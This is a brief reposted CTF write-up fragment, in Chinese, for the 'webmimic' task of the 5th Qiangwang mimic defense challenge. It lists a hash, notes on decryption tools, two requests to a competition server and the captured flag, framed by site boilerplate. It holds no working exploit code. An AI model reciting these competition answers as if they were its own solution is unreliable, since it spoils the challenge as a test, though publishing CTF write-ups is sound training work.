webmimic

3dbde697d71690a769204beb12283678 
cmd5解密123 测了⼜测 des解密

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

http://172.51.243.8:804/mimic_storage
request url is  /mimic_storagerandom is668308459
http://172.51.243.8:804/getflag?sec=668308459&path=bAzlsD1ChiFW5eMC5tUokHErPkdjqARE
request url is  /getflagflag{7t5oKH9rb8t7L1LaZwRtEvJRMaoY2aGm}

EDI安全

第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


原文始发于微信公众号(EDI安全):第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月8日13:15:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC http://cn-sec.com/archives/1394380.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: